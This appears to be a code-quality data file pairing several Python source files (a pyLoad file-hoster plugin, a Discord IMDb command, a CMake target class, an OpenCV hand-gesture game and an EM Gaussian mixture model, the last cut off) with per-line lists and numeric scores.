# -*- coding: utf-8 -*- import re from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo class BezvadataCz(SimpleHoster): __name__ = "BezvadataCz" __type__ = "hoster" __version__ = "0.29" __status__ = "testing" __pattern__ = r'http://(?:www\.)?bezvadata\.cz/stahnout/.+' __config__ = [("use_premium", "bool", "Use premium account if available", True)] __description__ = """BezvaData.cz hoster plugin""" __license__ = "GPLv3" __authors__ = [("zoidberg", "zoidberg@mujmail.cz")] NAME_PATTERN = r'<p><b>Soubor: (?P<N>[^<]+)</b></p>' SIZE_PATTERN = r'<li><strong>Velikost:</strong> (?P<S>[^<]+)</li>' OFFLINE_PATTERN = r'<title>BezvaData \| Soubor nenalezen</title>' def setup(self): self.resume_download = True self.multiDL = True def handle_free(self, pyfile): #: Download button m = re.search(r'<a class="stahnoutSoubor".*?href="(.*?)"', self.html) if m is None: self.error(_("Page 1 URL not found")) url = "http://bezvadata.cz%s" % m.group(1) #: Captcha form self.html = self.load(url) self.check_errors() for _i in xrange(5): action, inputs = self.parse_html_form('frm-stahnoutFreeForm') if not inputs: self.error(_("FreeForm")) m = re.search(r'<img src="data:image/png;base64,(.*?)"', self.html) if m is None: self.error(_("Wrong captcha image")) inputs['captcha'] = self.captcha._decrypt(m.group(1).decode('base64'), input_type='png') if '<img src="data:image/png;base64' in self.html: self.captcha.invalid() else: self.captcha.correct() break else: self.fail(_("No valid captcha code entered")) #: Download url self.html = self.load("http://bezvadata.cz%s" % action, post=inputs) self.check_errors() m = re.search(r'<a class="stahnoutSoubor2" href="(.*?)">', self.html) if m is None: self.error(_("Page 2 URL not found")) url = "http://bezvadata.cz%s" % m.group(1) self.log_debug("DL URL %s" % url) #: countdown m = re.search(r'id="countdown">(\d\d):(\d\d)<', self.html) wait_time = (int(m.group(1)) * 60 + int(m.group(2))) if m else 120 self.wait(wait_time, False) self.link = url def check_errors(self): if 'images/button-download-disable.png' in self.html: self.wait(5 * 60, 24, _("Download limit reached")) #: Parallel dl limit elif '<div class="infobox' in self.html: self.temp_offline() else: return super(BezvadataCz, self).check_errors() getInfo = create_getInfo(BezvadataCz)
[ "# -*- coding: utf-8 -*-\n", "\n", "import re\n", "\n", "from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo\n", "\n", "\n", "class BezvadataCz(SimpleHoster):\n", " __name__ = \"BezvadataCz\"\n", " __type__ = \"hoster\"\n", " __version__ = \"0.29\"\n", " __status__ = \"testing\"\n", "\n", " __pattern__ = r'http://(?:www\\.)?bezvadata\\.cz/stahnout/.+'\n", " __config__ = [(\"use_premium\", \"bool\", \"Use premium account if available\", True)]\n", "\n", " __description__ = \"\"\"BezvaData.cz hoster plugin\"\"\"\n", " __license__ = \"GPLv3\"\n", " __authors__ = [(\"zoidberg\", \"zoidberg@mujmail.cz\")]\n", "\n", "\n", " NAME_PATTERN = r'<p><b>Soubor: (?P<N>[^<]+)</b></p>'\n", " SIZE_PATTERN = r'<li><strong>Velikost:</strong> (?P<S>[^<]+)</li>'\n", " OFFLINE_PATTERN = r'<title>BezvaData \\| Soubor nenalezen</title>'\n", "\n", "\n", " def setup(self):\n", " self.resume_download = True\n", " self.multiDL = True\n", "\n", "\n", " def handle_free(self, pyfile):\n", " #: Download button\n", " m = re.search(r'<a class=\"stahnoutSoubor\".*?href=\"(.*?)\"', self.html)\n", " if m is None:\n", " self.error(_(\"Page 1 URL not found\"))\n", " url = \"http://bezvadata.cz%s\" % m.group(1)\n", "\n", " #: Captcha form\n", " self.html = self.load(url)\n", " self.check_errors()\n", " for _i in xrange(5):\n", " action, inputs = self.parse_html_form('frm-stahnoutFreeForm')\n", " if not inputs:\n", " self.error(_(\"FreeForm\"))\n", "\n", " m = re.search(r'<img src=\"data:image/png;base64,(.*?)\"', self.html)\n", " if m is None:\n", " self.error(_(\"Wrong captcha image\"))\n", "\n", " inputs['captcha'] = self.captcha._decrypt(m.group(1).decode('base64'), input_type='png')\n", "\n", " if '<img src=\"data:image/png;base64' in self.html:\n", " self.captcha.invalid()\n", " else:\n", " self.captcha.correct()\n", " break\n", " else:\n", " self.fail(_(\"No valid captcha code entered\"))\n", "\n", " #: Download url\n", " self.html = self.load(\"http://bezvadata.cz%s\" % action, post=inputs)\n", " self.check_errors()\n", " m = re.search(r'<a class=\"stahnoutSoubor2\" href=\"(.*?)\">', self.html)\n", " if m is None:\n", " self.error(_(\"Page 2 URL not found\"))\n", " url = \"http://bezvadata.cz%s\" % m.group(1)\n", " self.log_debug(\"DL URL %s\" % url)\n", "\n", " #: countdown\n", " m = re.search(r'id=\"countdown\">(\\d\\d):(\\d\\d)<', self.html)\n", " wait_time = (int(m.group(1)) * 60 + int(m.group(2))) if m else 120\n", " self.wait(wait_time, False)\n", "\n", " self.link = url\n", "\n", "\n", " def check_errors(self):\n", " if 'images/button-download-disable.png' in self.html:\n", " self.wait(5 * 60, 24, _(\"Download limit reached\")) #: Parallel dl limit\n", " elif '<div class=\"infobox' in self.html:\n", " self.temp_offline()\n", " else:\n", " return super(BezvadataCz, self).check_errors()\n", "\n", "\n", "getInfo = create_getInfo(BezvadataCz)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0.037037037037037035, 0, 0.03571428571428571, 0, 0, 0.023255813953488372, 0, 0, 0.03333333333333333, 0.016666666666666666, 0, 0, 0.017543859649122806, 0, 0, 0, 0, 0.047619047619047616, 0, 0.02857142857142857, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0 ]
87
0.004103
false
import aiohttp import discord async def imdb(cmd, message, args): if not args: return imdb_imput = ' '.join(args) url = 'http://www.omdbapi.com/?t=' + imdb_imput + '&y=&plot=short&r=json' async with aiohttp.ClientSession() as session: async with session.get(url) as data: request = await data.json() title = request['Title'] rated = request['Rated'] released = request['Released'] runtime = request['Runtime'] genre = request['Genre'] awards = request['Awards'] score = request['Metascore'] rating = request['imdbRating'] language = request['Language'] country = request['Country'] writers = request['Writer'] directors = request['Director'] actors = request['Actors'] plot = request['Plot'] movie_text = ('```\nTitle: ' + title + '\nReleased: ' + released + '\nRated: ' + rated + '\nRuntime: ' + runtime + '\nGenre: ' + genre + '\nCountry: ' + country + '\nLanguage: ' + language + '\nAwards: ' + awards + '\nWriters: ' + writers + '\nDirectors: ' + directors + '\nActors: ' + actors + '\nMetascore: ' + score + '\nIMDB Rating: ' + rating + '```') embed = discord.Embed(color=0x1abc9c) embed.add_field(name='🎥 Movie Details', value=movie_text) embed.add_field(name='📑 Plot', value='```\n' + plot + '\n```') await message.channel.send(None, embed=embed)
[ "import aiohttp\n", "import discord\n", "\n", "\n", "async def imdb(cmd, message, args):\n", " if not args:\n", " return\n", "\n", " imdb_imput = ' '.join(args)\n", " url = 'http://www.omdbapi.com/?t=' + imdb_imput + '&y=&plot=short&r=json'\n", " async with aiohttp.ClientSession() as session:\n", " async with session.get(url) as data:\n", " request = await data.json()\n", " title = request['Title']\n", " rated = request['Rated']\n", " released = request['Released']\n", " runtime = request['Runtime']\n", " genre = request['Genre']\n", " awards = request['Awards']\n", " score = request['Metascore']\n", " rating = request['imdbRating']\n", " language = request['Language']\n", " country = request['Country']\n", " writers = request['Writer']\n", " directors = request['Director']\n", " actors = request['Actors']\n", " plot = request['Plot']\n", " movie_text = ('```\\nTitle: ' + title +\n", " '\\nReleased: ' + released +\n", " '\\nRated: ' + rated +\n", " '\\nRuntime: ' + runtime +\n", " '\\nGenre: ' + genre +\n", " '\\nCountry: ' + country +\n", " '\\nLanguage: ' + language +\n", " '\\nAwards: ' + awards +\n", " '\\nWriters: ' + writers +\n", " '\\nDirectors: ' + directors +\n", " '\\nActors: ' + actors +\n", " '\\nMetascore: ' + score +\n", " '\\nIMDB Rating: ' + rating + '```')\n", " embed = discord.Embed(color=0x1abc9c)\n", " embed.add_field(name='🎥 Movie Details', value=movie_text)\n", " embed.add_field(name='📑 Plot', value='```\\n' + plot + '\\n```')\n", " await message.channel.send(None, embed=embed)\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
44
0
false
import blackjack.cmake.cmd as cmd from .BaseTarget import BaseTarget class LibTarget_Interface(BaseTarget): """ Represents a CMake Interface Library target An Interface library target does not directly create build output though it may have properties set on it and it may be installed, exported and imported add_library(<name> INTERFACE [IMPORTED [GLOBAL]]) """ def __init__(self, name: str, imported: bool = False, globalimport: bool = False): super().__init__(name) self.Imported = imported """If the library is imported""" self.GlobalImport = globalimport """Global Import""" return def render_body(self): ret = [] ret += ["## Library Target - Interface"] ret += super().render_prefix() tmpopts = "INTERFACE" if self.Imported: tmpopts += " IMPORTED" if self.GlobalImport: tmpopts += " GLOBAL" libcmd = cmd.add_library(self.Name, tmpopts, []) ret += libcmd.render() ret += super().render_body() return ret
[ "import blackjack.cmake.cmd as cmd\n", "from .BaseTarget import BaseTarget\n", "\n", "class LibTarget_Interface(BaseTarget):\n", "\n", " \"\"\"\n", " Represents a CMake Interface Library target\n", " An Interface library target does not directly create build output\n", " though it may have properties set on it and it may be installed, exported and imported\n", "\n", " add_library(<name> INTERFACE [IMPORTED [GLOBAL]])\n", " \"\"\"\n", "\n", " def __init__(self, name: str, imported: bool = False, globalimport: bool = False):\n", " super().__init__(name)\n", " self.Imported = imported\n", " \"\"\"If the library is imported\"\"\"\n", " self.GlobalImport = globalimport\n", " \"\"\"Global Import\"\"\"\n", " return\n", "\n", " def render_body(self):\n", " ret = []\n", " ret += [\"## Library Target - Interface\"]\n", " ret += super().render_prefix()\n", " tmpopts = \"INTERFACE\"\n", " if self.Imported:\n", " tmpopts += \" IMPORTED\"\n", " if self.GlobalImport:\n", " tmpopts += \" GLOBAL\"\n", "\n", " libcmd = cmd.add_library(self.Name, tmpopts, [])\n", " ret += libcmd.render()\n", " ret += super().render_body()\n", " return ret\n" ]
[ 0, 0, 0, 0.02564102564102564, 0, 0, 0, 0, 0.01098901098901099, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
35
0.001375
false
import sys #from gameDemo import video #Change the following line sys.path.append('C:\opencv\sources\samples\python2') import numpy as np import cv2 #import video import socket import time import math UDP_IP = "127.0.0.1" UDP_PORT = 5005 print "UDP target IP:", UDP_IP print "UDP target port:", UDP_PORT #print "message:", MESSAGE sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP cap = cv2.VideoCapture(0) _ , initImg = cap.read() while(cap.isOpened()): ret, img = cap.read() #img -= initImg; cv2.rectangle(img,(300,300),(100,100),(0,255,0),0) crop_img = img[100:300, 100:300] grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY) value = (35, 35) blurred = cv2.GaussianBlur(grey, value, 0) _, thresh1 = cv2.threshold(blurred, 63, 255, cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU) cv2.imshow('Thresholded', thresh1) _ , contours, hierarchy = cv2.findContours(thresh1.copy(),cv2.RETR_TREE, \ cv2.CHAIN_APPROX_NONE) max_area = -1 for i in range(len(contours)): cnt=contours[i] area = cv2.contourArea(cnt) if(area>max_area): max_area=area ci=i cnt=contours[ci] x,y,w,h = cv2.boundingRect(cnt) cv2.rectangle(crop_img,(x,y),(x+w,y+h),(0,0,255),0) hull = cv2.convexHull(cnt) drawing = np.zeros(crop_img.shape,np.uint8) cv2.drawContours(drawing,[cnt],0,(0,255,0),0) cv2.drawContours(drawing,[hull],0,(0,0,255),0) hull = cv2.convexHull(cnt,returnPoints = False) defects = cv2.convexityDefects(cnt,hull) count_defects = 0 cv2.drawContours(thresh1, contours, -1, (0,255,0), 3) for i in range(defects.shape[0]): s,e,f,d = defects[i,0] start = tuple(cnt[s][0]) end = tuple(cnt[e][0]) far = tuple(cnt[f][0]) a = math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2) b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2) c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2) angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57 if angle <= 90: count_defects += 1 cv2.circle(crop_img,far,1,[0,0,255],-1) #dist = cv2.pointPolygonTest(cnt,far,True) cv2.line(crop_img,start,end,[0,255,0],2) #cv2.circle(crop_img,far,5,[0,0,255],-1) if count_defects == 1: #print w*h if w * h > 14000 and w*h < 24000: cv2.putText(img,"Rock", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2) sock.sendto("Rock" , (UDP_IP, UDP_PORT)) elif count_defects == 2: str = "Scisor" print str cv2.putText(img, str, (5,50), cv2.FONT_HERSHEY_SIMPLEX, 1, 2) sock.sendto("Scisor" , (UDP_IP, UDP_PORT)) elif count_defects == 3: cv2.putText(img,"Noting3", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2) elif count_defects == 4: cv2.putText(img,"Nothing4", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2) else: cv2.putText(img,"Paper", (50,50),\ cv2.FONT_HERSHEY_SIMPLEX, 2, 2) sock.sendto("Paper" , (UDP_IP, UDP_PORT)) #cv2.imshow('drawing', drawing) #cv2.imshow('end', crop_img) cv2.imshow('Gesture', img) all_img = np.hstack((drawing, crop_img)) cv2.imshow('Contours', all_img) k = cv2.waitKey(10) if k == 27: break
[ "import sys\n", "#from gameDemo import video\n", "#Change the following line\n", "sys.path.append('C:\\opencv\\sources\\samples\\python2')\n", "\n", "import numpy as np\n", "import cv2\n", "#import video\n", "\n", "import socket\n", "import time\n", "import math\n", "\n", "\n", "UDP_IP = \"127.0.0.1\"\n", "UDP_PORT = 5005\n", "\n", "print \"UDP target IP:\", UDP_IP\n", "print \"UDP target port:\", UDP_PORT\n", "#print \"message:\", MESSAGE\n", "\n", "sock = socket.socket(socket.AF_INET, # Internet\n", " socket.SOCK_DGRAM) # UDP\n", "\n", "cap = cv2.VideoCapture(0)\n", "_ , initImg = cap.read()\n", "while(cap.isOpened()):\n", " ret, img = cap.read() \n", " #img -= initImg; \n", " cv2.rectangle(img,(300,300),(100,100),(0,255,0),0)\n", " crop_img = img[100:300, 100:300]\n", " grey = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n", " value = (35, 35)\n", " blurred = cv2.GaussianBlur(grey, value, 0)\n", " _, thresh1 = cv2.threshold(blurred, 63, 255,\n", " cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n", " cv2.imshow('Thresholded', thresh1)\n", " _ , contours, hierarchy = cv2.findContours(thresh1.copy(),cv2.RETR_TREE, \\\n", " cv2.CHAIN_APPROX_NONE)\n", " max_area = -1\n", " for i in range(len(contours)):\n", " cnt=contours[i]\n", " area = cv2.contourArea(cnt)\n", " if(area>max_area):\n", " max_area=area\n", " ci=i\n", " cnt=contours[ci]\n", " x,y,w,h = cv2.boundingRect(cnt)\n", " cv2.rectangle(crop_img,(x,y),(x+w,y+h),(0,0,255),0)\n", " hull = cv2.convexHull(cnt)\n", " drawing = np.zeros(crop_img.shape,np.uint8)\n", " cv2.drawContours(drawing,[cnt],0,(0,255,0),0)\n", " cv2.drawContours(drawing,[hull],0,(0,0,255),0)\n", " hull = cv2.convexHull(cnt,returnPoints = False)\n", " defects = cv2.convexityDefects(cnt,hull)\n", " count_defects = 0\n", " cv2.drawContours(thresh1, contours, -1, (0,255,0), 3)\n", " for i in range(defects.shape[0]):\n", " s,e,f,d = defects[i,0]\n", " start = tuple(cnt[s][0])\n", " end = tuple(cnt[e][0])\n", " far = tuple(cnt[f][0])\n", " a = math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2)\n", " b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2)\n", " c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2)\n", " angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57\n", " if angle <= 90:\n", " count_defects += 1\n", " cv2.circle(crop_img,far,1,[0,0,255],-1)\n", " #dist = cv2.pointPolygonTest(cnt,far,True)\n", " cv2.line(crop_img,start,end,[0,255,0],2)\n", " #cv2.circle(crop_img,far,5,[0,0,255],-1)\n", " if count_defects == 1:\n", " #print w*h\n", " if w * h > 14000 and w*h < 24000:\n", " cv2.putText(img,\"Rock\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " sock.sendto(\"Rock\" , (UDP_IP, UDP_PORT))\n", " elif count_defects == 2:\n", " str = \"Scisor\"\n", " print str\n", " cv2.putText(img, str, (5,50), cv2.FONT_HERSHEY_SIMPLEX, 1, 2)\n", " sock.sendto(\"Scisor\" , (UDP_IP, UDP_PORT))\n", " elif count_defects == 3:\n", " cv2.putText(img,\"Noting3\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " elif count_defects == 4:\n", " cv2.putText(img,\"Nothing4\", (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " else:\n", " cv2.putText(img,\"Paper\", (50,50),\\\n", " cv2.FONT_HERSHEY_SIMPLEX, 2, 2)\n", " sock.sendto(\"Paper\" , (UDP_IP, UDP_PORT))\n", " #cv2.imshow('drawing', drawing)\n", " #cv2.imshow('end', crop_img)\n", " cv2.imshow('Gesture', img)\n", " all_img = np.hstack((drawing, crop_img))\n", " cv2.imshow('Contours', all_img)\n", " k = cv2.waitKey(10)\n", " if k == 27:\n", " break" ]
[ 0, 0.03571428571428571, 0.037037037037037035, 0.07547169811320754, 0, 0.05263157894736842, 0.09090909090909091, 0.07142857142857142, 0, 0.07142857142857142, 0.08333333333333333, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.020833333333333332, 0.021739130434782608, 0, 0, 0.04, 0, 0.034482758620689655, 0.09090909090909091, 0.14545454545454545, 0, 0, 0, 0, 0, 0, 0, 0.0379746835443038, 0.02857142857142857, 0, 0, 0.041666666666666664, 0, 0.037037037037037035, 0.038461538461538464, 0.058823529411764705, 0.047619047619047616, 0.08333333333333333, 0.14285714285714285, 0, 0.020833333333333332, 0.12, 0.11764705882352941, 0.057692307692307696, 0.022222222222222223, 0, 0.034482758620689655, 0, 0.12903225806451613, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.11538461538461539, 0.0196078431372549, 0.12244897959183673, 0.02040816326530612, 0, 0.05263157894736842, 0, 0.025974025974025976, 0.018867924528301886, 0, 0, 0, 0.014285714285714285, 0.0196078431372549, 0, 0.02631578947368421, 0, 0.025974025974025976, 0, 0.06976744186046512, 0, 0.02, 0.027777777777777776, 0.030303030303030304, 0, 0, 0, 0, 0, 0.07692307692307693 ]
98
0.027513
false
import numpy as np from scipy.cluster import vq from .util import normalize, logsum, log_like_Gauss, num_param_Gauss from .sampling import testData class EMGMM: """ Gaussian Mixture Model with Expectation-Maximization (EM) Algorithm. Attributes _nstates [int] : number of hidden states, nmix pi [ndarray, shape (_nstates)] : mixing coefficients mu [ndarray, shape (_nstates, dim)] : mean vectors cv [ndarray, shape (_nstates, dim, dim)] : covariance matrix Methods showModel : show model parameters eval_hidden_states : get the propability of hidden states score : score the model with respect to some criteria fit : fit model parameters decode : return most probable hidden states plot1d : plot most probable hidden states along one axis of data plot2d : plot most probable hidden states along two axes of data makeTransMat : make transition matrix by regarding the data as time series """ def __init__(self,nmix=10): # maximum number of the hidden clusters self._nstates = nmix def _init_params(self,obs,adjust_prior=True): """ Initialize prior and posterior parameters before running iterative fitting. """ nmix = self._nstates nobs, ndim = obs.shape self._init_prior(obs,adjust_prior) self._init_posterior(obs) # auxuality variable to store unnormalized sample posterior cov mat self._C = np.empty((nmix,ndim,ndim)) def _init_prior(self,obs,adjust_prior): pass def _init_posterior(self,obs): """ Initialize posterior parameters """ nmix = self._nstates nobs, ndim = obs.shape # initialize hidden states self.z = np.ones((nobs,nmix)) / float(nmix) # initialize mixing coefficients self.pi = np.ones(nmix) / float(nmix) # initialize mean vectors with K-Means clustering self.mu, temp = vq.kmeans2(obs,nmix) # initialize covariance matrices with sample covariance matrix self.cv = np.tile(np.atleast_2d(np.cov(obs.T)),(nmix,1,1)) def showModel(self,show_mu=False,show_cv=False,min_pi=0.01): """ Obtain model parameters for relavent clusters input show_mu [bool] : if print mean vectors show_cv [bool] : if print covariance matrices min_pi [float] : components whose pi < min_pi will be excluded output relavent_clusters [list of list] : a list of list whose fist index is the cluster and the second is properties of each cluster. - relavent_clusters[i][0] = mixing coefficients - relavent_clusters[i][1] = cluster id - relavent_clusters[i][2] = mean vector - relavent_clusters[i][3] = covariance matrix Clusters are sorted in descending order along their mixing coeffcients """ nmix = self._nstates # make a tuple of properties and sort its member by mixing coefficients params = sorted(zip(self.pi,range(nmix),self.mu,self.cv),\ key=lambda x:x[0],reverse=True) relavent_clusters = [] for k in xrange(nmix): # exclude clusters whose pi < min_pi if params[k][0] < min_pi: break relavent_clusters.append(params[k]) print "\n%dth component, pi = %8.3g" % (k,params[k][0]) print "cluster id =", params[k][1] if show_mu: print "mu =",params[k][2] if show_cv: print "cv =",params[k][3] return relavent_clusters def _log_like_f(self,obs): """ log-likelihood function of of complete data, lnP(X,Z|theta) input obs [ndarray, shape (nobs,ndim)] : observed data output lnf [ndarray, shape (nobs, nmix)] : log-likelihood where lnf[n,k] = lnP(X_n,Z_n=k|theta) """ lnf = np.log(self.pi)[np.newaxis,:] \ + log_like_Gauss(obs,self.mu,self.cv) return lnf def eval_hidden_states(self,obs): """ Calc P(Z|X,theta) = exp(lnP(X,Z|theta)) / C where C = sum_Z exp(lnP(X,Z|theta)) = P(X|theta) input obs [ndarray, shape (nobs,ndim)] : observed data output z [ndarray, shape (nobs,nmix)] : posterior probabiliry of hidden states where z[n,k] = P(Z_n=k|X_n,theta) lnP [float] : lnP(X|theta) """ lnf = self._log_like_f(obs) lnP = logsum(lnf,1) z = np.exp(lnf - lnP[:,np.newaxis]) return z,lnP.sum() def score(self,obs,mode="BIC"): """ score the model input obs [ndarray, shape(nobs,ndim)] : observed data mode [string] : one of 'ML', 'AIC' or 'BIC' output S [float] : score of the model """ z,lnP = self.eval_hidden_states(obs) nmix = self._nstates nobs, ndim = obs.shape k = num_param_Gauss(ndim) if mode in ("AIC", "aic"): # use Akaike information criterion S = -lnP + (nmix + k * nmix) if mode in ("BIC", "bic"): # use Bayesian information criterion S = -lnP + (nmix + k * nmix) * np.log(nobs) else: # use negative likelihood S = -lnP return S def fit(self,obs,niter=1000,eps=1.0e-4,ifreq=10,init=True,plot=False): """ Fit model parameters via EM algorithm input obs [ndarray, shape(nobs,ndim)] : observed data niter [int] : maximum number of iteration cyles eps [float] : convergence threshold ifreq [int] : frequency of printing fitting process init [bool] : flag for initialization plot [bool] : flag for plotting the result """ # initialize parameters if init: self._init_params(obs) # initialize free energy F = 1.0e50 # main loop for i in xrange(niter): # performe E step and set new free energy F_new = - self._E_step(obs) # take difference dF = F_new - F # check convergence if abs(dF) < eps : print "%8dth iter, Free Energy = %12.6e, dF = %12.6e" \ %(i,F_new,dF) print "%12.6e < %12.6e Converged" %(dF, eps) break # print iteration info if i % ifreq == 0 and dF < 0.0: print "%8dth iter, Free Energy = %12.6e, dF = %12.6e" \ %(i,F_new,dF) elif dF > 0.0: print "%8dth iter, Free Energy = %12.6e, dF = %12.6e warning" \ %(i,F_new,dF) # update free energy F = F_new # update parameters by M step self._M_step(obs) # plot clustering result if plot: self.plot2d(obs) return self def _E_step(self,obs): """ E step, calculate posteriors P(Z|X,theta) input obs [ndarray, shape(nobs,ndim)] : observed data output lnP [float] : log-likelihood, lnP(X|theta) """ self.z, lnP = self.eval_hidden_states(obs) return lnP def _M_step(self,obs): """ M step calculates sufficient statistics and use them to update parameters input obs [ndarray, shape(nobs,ndim)] : observed data """ self._calculate_sufficient_statistics(obs) self._update_parameters() def _calculate_sufficient_statistics(self,obs): """ Calculate sufficient Statistics """ nmix = self._nstates # posterior average number of observation self._N = self.z.sum(0) # posterior average of x self._xbar = np.dot(self.z.T,obs) / self._N[:,np.newaxis] # posterior unnormalized sample covariance matrices for k in xrange(nmix): dobs = obs - self._xbar[k] self._C[k] = np.dot((self.z[:,k] * dobs.T), dobs) def _update_parameters(self,min_cv=0.001): """ Update parameters of posterior distribution by precomputed sufficient statistics """ nmix = self._nstates # parameter for mixing coefficients self.pi = self._N / self._N.sum() # parameters for mean vectors self.mu = np.array(self._xbar) # parameters for covariance matrices self.cv = np.identity(len(self._C[0])) * min_cv \ + self._C / self._N[:,np.newaxis,np.newaxis] def decode(self,obs,eps=0.01): """ Return most probable cluster ids. Clusters are sorted along the mixing coefficients """ # get probabilities of hidden states z,lnP = self.eval_hidden_states(obs) # take argmax codes = z.argmax(1) # get sorted ids params = self.showModel(min_pi=eps) # assign each observation to corresponding cluster clust_pos = [] for p in params: clust_pos.append(codes==p[1]) return clust_pos def plot1d(self,obs,d1=0,eps=0.01,clust_pos=None): """ plot data of each cluster along one axis input obs [ndarray, shape(nobs,ndim)] : observed data d1 [int, optional] : id of axis clust_pos [list, optional] : decoded cluster postion """ # plotting symbols symbs = ".hd^x+" # plot range l = np.arange(len(obs)) # decode observed data if clust_pos == None: clust_pos = self.decode(obs,eps) # import pyplot try : import matplotlib.pyplot as plt except ImportError : print "cannot import pyplot" return # plot data for k,pos in enumerate(clust_pos): symb = symbs[k / 7] plt.plot(l[pos],obs[pos,d1],symb,label="%3dth cluster"%k) plt.legend(loc=0) plt.show() def plot2d(self,obs,d1=0,d2=1,eps=0.01,clust_pos=None): """ plot data of each cluster along two axes input obs [ndarray, shape(nobs,ndim)] : observed data d1 [int, optional] : id of the 1st axis d2 [int, optional] : id of the 2nd axis clust_pos [list, optional] : decoded cluster postion """ symbs = ".hd^x+" if clust_pos == None: clust_pos = self.decode(obs,eps) try : import matplotlib.pyplot as plt except ImportError : print "cannot import pyplot" return for k,pos in enumerate(clust_pos): symb = symbs[k / 7] plt.plot(obs[pos,d1],obs[pos,d2],symb,label="%3dth cluster"%k) plt.legend(loc=0) plt.show() def makeTransMat(self,obs,norm=True,min_degree=1,eps=0.01): """ Make transition probability matrix MT where MT[i,j] = N(x_{t+1}=j|x_t=i) input obs [ndarray, shape(nobs,ndim)] : observed data norm [bool] : if normalize or not min_degree [int] : transitions which occured less than min_degree times will be omitted. output MT [ndarray, shape(nmix,nmix)] : transition probabiliry matrix nmix is effective number of clusters """ # get probability of hidden states z,lnP = self.eval_hidden_states(obs) dim = self._nstates #initialize MT MT = np.zeros((dim,dim)) # main loop for t in xrange(1,len(z)-1): MT += np.outer(z[t-1],z[t]) for i in xrange(len(MT)): for j in xrange(len(MT)): if MT[i,j] < min_degree: MT[i,j] = 0.0 # extract relavent cluster params = self.showModel(min_pi=eps) cl = [p[1] for p in params] MT = np.array([mt[cl] for mt in MT[cl]]) if norm: # MT[i,j] = P(x_{t+1}=j|x_t=i) MT = normalize(MT,1) return MT
[ "import numpy as np\n", "from scipy.cluster import vq\n", "from .util import normalize, logsum, log_like_Gauss, num_param_Gauss\n", "from .sampling import testData\n", "\n", "class EMGMM:\n", " \"\"\"\n", " Gaussian Mixture Model with Expectation-Maximization (EM) Algorithm.\n", "\n", " Attributes\n", " _nstates [int] : number of hidden states, nmix\n", " pi [ndarray, shape (_nstates)] : mixing coefficients\n", " mu [ndarray, shape (_nstates, dim)] : mean vectors\n", " cv [ndarray, shape (_nstates, dim, dim)] : covariance matrix\n", " Methods\n", " showModel : show model parameters\n", " eval_hidden_states : get the propability of hidden states\n", " score : score the model with respect to some criteria\n", " fit : fit model parameters\n", " decode : return most probable hidden states\n", " plot1d : plot most probable hidden states along one axis of data\n", " plot2d : plot most probable hidden states along two axes of data\n", " makeTransMat : make transition matrix by regarding the data as time series\n", " \"\"\"\n", " def __init__(self,nmix=10):\n", " # maximum number of the hidden clusters\n", " self._nstates = nmix\n", "\n", " def _init_params(self,obs,adjust_prior=True):\n", " \"\"\"\n", " Initialize prior and posterior parameters before running\n", " iterative fitting.\n", " \"\"\"\n", " nmix = self._nstates\n", " nobs, ndim = obs.shape\n", " self._init_prior(obs,adjust_prior)\n", " self._init_posterior(obs)\n", "\n", " # auxuality variable to store unnormalized sample posterior cov mat\n", " self._C = np.empty((nmix,ndim,ndim))\n", "\n", " def _init_prior(self,obs,adjust_prior):\n", " pass\n", "\n", " def _init_posterior(self,obs):\n", " \"\"\"\n", " Initialize posterior parameters\n", " \"\"\"\n", " nmix = self._nstates\n", " nobs, ndim = obs.shape\n", " # initialize hidden states\n", " self.z = np.ones((nobs,nmix)) / float(nmix)\n", " # initialize mixing coefficients\n", " self.pi = np.ones(nmix) / float(nmix)\n", " # initialize mean vectors with K-Means clustering\n", " self.mu, temp = vq.kmeans2(obs,nmix)\n", " # initialize covariance matrices with sample covariance matrix\n", " self.cv = np.tile(np.atleast_2d(np.cov(obs.T)),(nmix,1,1))\n", "\n", " def showModel(self,show_mu=False,show_cv=False,min_pi=0.01):\n", " \"\"\"\n", " Obtain model parameters for relavent clusters\n", " input\n", " show_mu [bool] : if print mean vectors\n", " show_cv [bool] : if print covariance matrices\n", " min_pi [float] : components whose pi < min_pi will be excluded\n", " output\n", " relavent_clusters [list of list] : a list of list whose fist index is\n", " the cluster and the second is properties of each cluster.\n", " - relavent_clusters[i][0] 